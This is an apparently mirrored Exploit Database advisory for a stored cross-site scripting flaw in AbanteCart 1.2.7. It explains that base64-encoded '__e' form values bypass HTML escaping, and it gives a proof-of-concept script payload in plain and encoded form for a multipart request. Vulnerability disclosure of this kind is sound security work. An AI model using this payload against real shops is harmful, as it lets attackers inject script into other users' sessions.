AbanteCart 1.2.7 – Cross-Site Scripting

• Exploit Database
• 105 阅读

• 作者： Kacper Szurek
  日期： 2016-12-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40877/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27

  # Exploit Title: AbanteCart 1.2.7 Stored XSS # Date: 06-12-2016 # Software Link: http://www.abantecart.com/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # Category: webapps 1. Description   By default all user input is escaped using <code>htmlspecialchars</code>.   But we can pass <code>__e</code> value which is base64 encoded and unfortunatelly those datas are not cleaned.   http://security.szurek.pl/abantecart-127-stored-xss-and-sql-injection.html   2. Proof of Concept   For example <code>address_1="><script>alert(2);</script>&</code> can be encoded as: <code>__e=YWRkcmVzc18xPSI+PHNjcmlwdD5hbGVydCgyKTs8L3NjcmlwdD4m</code>.   So create new order and set <code>address_1</code> value as <code>__e</code> using for example Burp: </code><code> Content-Disposition: form-data; name="__e"   YWRkcmVzc18xPSI+PHNjcmlwdD5hbGVydCgyKTs8L3NjcmlwdD4m </code><code>